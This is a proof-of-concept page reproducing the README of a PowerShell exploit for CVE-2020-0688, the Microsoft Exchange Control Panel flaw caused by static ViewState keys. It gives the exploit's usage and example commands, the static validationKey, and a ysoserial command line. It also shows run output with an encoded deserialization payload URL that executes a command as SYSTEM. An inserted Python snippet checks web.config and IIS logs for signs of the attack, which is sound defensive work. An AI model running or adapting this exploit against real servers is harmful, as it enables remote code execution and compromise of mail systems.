PoC details: 96b8022592c46e3f0dc16f94cc6d7da84ecb0475

Source
Related vulnerability
Title: Microsoft Exchange Server authorization issue vulnerability (CVE-2020-0688)
Description: Microsoft Exchange Server is a mail server product from Microsoft Corporation (USA). It provides mail access, storage and forwarding, voice mail, mail filtering and similar features. An authorization issue vulnerability exists in Microsoft Exchange Server, caused by the program failing to handle objects in memory correctly. An attacker could exploit this vulnerability via a specially crafted e-mail to run arbitrary code in the context of the system user. The following products and versions are affected: Microsoft Exchange Server 2010, Microsoft Exchange Server 2013, Micro
Description
Remote Code Execution on Microsoft Exchange Server through fixed cryptographic keys
Introduction
# CVE-2020-0688

A remote code execution vulnerability exists in Microsoft Exchange Server when the server fails to properly create unique keys at install time.

Knowledge of the validation key allows an authenticated user with a mailbox to pass arbitrary objects to be deserialized by the web application, which runs as SYSTEM.

## About Vulnerability

The bug is found in the Exchange Control Panel (ECP) component. The nature of the bug is quite simple. Instead of having randomly-generated keys on a per-installation basis, all installations of Microsoft Exchange Server have the same `validationKey` and `decryptionKey` values in `web.config`. These keys are used to provide security for ViewState. ViewState is server-side data that ASP.NET web applications store in serialized format on the client. The client provides this data back to the server via the `__VIEWSTATE` request parameter.

Due to the use of static keys, an authenticated attacker can trick the server into deserializing maliciously crafted ViewState data. With the help of [YSoSerial.net](https://github.com/pwntester/ysoserial.net), an attacker can execute arbitrary .NET code on the server in the context of the Exchange Control Panel web application, which runs as SYSTEM. ([Source](https://www.thezdi.com/blog/2020/2/24/cve-2020-0688-remote-code-execution-on-microsoft-exchange-server-through-fixed-cryptographic-keys))
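Two defender-side checks that follow from the description above, added here as an example and not part of this tool or its README: an audit of the ECP `web.config` for the static `validationKey` (the value the page's own ysoserial command line uses), and a scan of IIS logs for `/ecp/` requests that carry `__VIEWSTATE` in the query string, which is where the exploit URL shown later on this page puts it, whereas normal ViewState travels in a POST body. The W3C field order of the sample log, the decryptionKey placeholder and the "patched" key are constructed assumptions.

```python
import xml.etree.ElementTree as ET
from urllib.parse import parse_qs

# validationKey the page's ysoserial invocation passes: shared by every unpatched
# install, so finding it in web.config is the condition to flag.
KNOWN_STATIC_VALIDATION_KEY = "CB2721ABDAF8E9DC516D621D8B8BF13A2C9E8689A25303BF"

def machinekey_is_static(web_config_xml: str) -> bool:
    """True if any <machineKey> in the config still carries the known static validationKey."""
    root = ET.fromstring(web_config_xml)
    return any((mk.get("validationKey") or "").upper() == KNOWN_STATIC_VALIDATION_KEY
               for mk in root.iter("machineKey"))

def suspicious_ecp_requests(log_lines):
    """Return (client_ip, username, uri_stem, status) for W3C IIS log entries where an
    /ecp/ request carries __VIEWSTATE in the query string (ViewState normally arrives
    in the POST body, not the URL)."""
    hits = []
    for line in log_lines:
        fields = line.split()
        if line.startswith("#") or len(fields) < 10:
            continue  # skip #Fields/#Date directives and malformed entries
        # Assumed field order: date time s-ip cs-method cs-uri-stem cs-uri-query
        #                      s-port cs-username c-ip sc-status
        stem, query, user, client, status = fields[4], fields[5], fields[7], fields[8], fields[9]
        if not stem.lower().startswith("/ecp/") or query == "-":
            continue
        if "__VIEWSTATE" in parse_qs(query, keep_blank_values=True):
            hits.append((client, user, stem, status))
    return hits

# Constructed sample data (not real captures); decryptionKey is a placeholder.
VULNERABLE_WEB_CONFIG = """<configuration><system.web>
  <machineKey validationKey="CB2721ABDAF8E9DC516D621D8B8BF13A2C9E8689A25303BF" validation="SHA1"
              decryptionKey="DECRYPTIONKEY-PLACEHOLDER" decryption="3DES" />
</system.web></configuration>"""
PATCHED_WEB_CONFIG = VULNERABLE_WEB_CONFIG.replace(  # constructed per-install key
    KNOWN_STATIC_VALIDATION_KEY, "0F0F0F0F0F0F0F0F0F0F0F0F0F0F0F0F0F0F0F0F0F0F0F0F")
SAMPLE_IIS_LOG = [
    "#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip sc-status",
    "2020-03-01 10:00:01 10.0.0.5 POST /owa/auth.owa - 443 - 192.0.2.10 200",
    "2020-03-01 10:00:03 10.0.0.5 POST /ecp/default.aspx - 443 CORP\\alice 192.0.2.10 200",
    "2020-03-01 10:00:05 10.0.0.5 GET /ecp/default.aspx "
    "__VIEWSTATEGENERATOR=B97B4E27&__VIEWSTATE=%2FwEyywYAAQAAAP 443 CORP\\alice 192.0.2.10 500",
]

if __name__ == "__main__":
    print("static machineKey present:", machinekey_is_static(VULNERABLE_WEB_CONFIG))
    for hit in suspicious_ecp_requests(SAMPLE_IIS_LOG):
        print("suspicious ECP request:", hit)
```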

## Getting Started

These instructions will get a copy of the project up and running on your local machine for development and testing purposes.

### Prerequisites

- PowerShell

### Installation

```powershell
git clone https://github.com/MrTiz/CVE-2020-0688.git
```

## Usage

```powershell
PowerShell.exe -ExecutionPolicy Bypass -File .\CVE-2020-0688.ps1 -Url <url> -Username <username> -Password <password> -Command <command> -YsoserialPath <ysoserialpath>
```

## Example

```powershell
PowerShell.exe -ExecutionPolicy Bypass -File .\CVE-2020-0688.ps1 -Url 'https://localhost' -Username 'domain\username' -Password 'REDACTED' -Command 'powershell whoami > C:/whoami.txt' -YsoserialPath 'C:\Users\User\Desktop\CVE-2020-0688\ysoserial\ysoserial.exe'

[*] Start to exploit...
[+] Login url: https://localhost:443/owa/auth.owa
[*] Status code: 200
[+] Login successfully!
[*] Tring to get __VIEWSTATEGENERATOR...
[+] Done! __VIEWSTATEGENERATOR: B97B4E27
[*] Tring to get ASP.NET_SessionId...
[+] Done! ASP.NET_SessionId: 624abfff-85b6-4357-be8c-18a931cad256

C:\Users\User\Desktop\CVE-2020-0688\ysoserial\ysoserial.exe -p ViewState -g TextFormattingRunProperties -c "powershell whoami > C:/whoami.txt" --validationalg="SHA1" --validationkey="CB2721ABDAF8E9DC516D621D8B8BF13A2C9E8689A25303BF" --generator="B97B4E27" --viewstateuserkey="624abfff-85b6-4357-be8c-18a931cad256" --islegacy --isdebug

[+] Exp url: https://localhost:443/ecp/default.aspx?__VIEWSTATEGENERATOR=B97B4E27&__VIEWSTATE=%2FwEyywYAAQAAAP%2F%2F%2F%...%2BDQoJIDxPYmplY3REYXRhUHJvdmlkZXIgeDpLZXk9IiIgT2JqZWN0VHlwZSA9ICJ7IHg6VHlwZSBEaWFnOlByb2Nlc3N9IiBNZXRob2ROYW1lID0gIlN0YXJ0IiA%2BDQogICAgIDxPYmplY3REYXRhUHJvdmlkZXIuTWV0aG9kUGFyYW1ldGVycz4NCiAgICAgICAgPFN5c3RlbTpTdHJpbmc%2BcG93ZXJzaGVsbDwvU3lzdGVtOlN0cmluZz4NCiAgICAgICAgPFN5c3RlbTpTdHJpbmc%2BIndob2FtaSAmZ3Q7IEM6L3dob2FtaS50eHQiIDwvU3lzdGVtOlN0cmluZz4NCiAgICAgPC9PYmplY3REYXRhUHJvdmlkZXIuTWV0aG9kUGFyYW1ldGVycz4NCiAgICA8L09iamVjdERhdGFQcm92aWRlcj4NCjwvUmVzb3VyY2VEaWN0aW9uYXJ5Pgviru9bDCgMPT0snH0s0u%2BA6J37Fg%3D%3D

[*] Auto trigger payload...
[+] Status code: 500, Maybe success!
```

## Contributing

Contributions are what make the open source community such a good place to learn, inspire, and create.
Any contributions you can provide are **greatly appreciated**.

1. Fork the Project
2. Create your Feature Branch (`git checkout -b feature/AmazingFeature`)
3. Commit your Changes (`git commit -m 'Add some AmazingFeature'`)
4. Push to the Branch (`git push origin feature/AmazingFeature`)
5. Open a Pull Request

## Authors

- **[Tiziano Marra](https://github.com/MrTiz)**

## Disclaimer

This exploit was developed and published for educational and research purposes only. The author assumes no responsibility for any illegal use. Use it at your own risk and only against systems for which you are authorized to test it.

## License
[![License: GPL v3](https://img.shields.io/badge/License-GPLv3-blue.svg)](https://www.gnu.org/licenses/gpl-3.0)

This project is licensed under the GNU General Public License v3.0 - see the 
[LICENSE](https://github.com/MrTiz/CVE-2020-0688/blob/master/LICENSE) file for details.
File snapshot

```
[4.0K] /data/pocs/96b8022592c46e3f0dc16f94cc6d7da84ecb0475
├── [9.5K] CVE-2020-0688.ps1
├── [ 34K] LICENSE
├── [5.1K] README.md
└── [4.0K] ysoserial
    ├── [ 22K] NDesk.Options.dll
    └── [133K] ysoserial.exe

1 directory, 5 files
```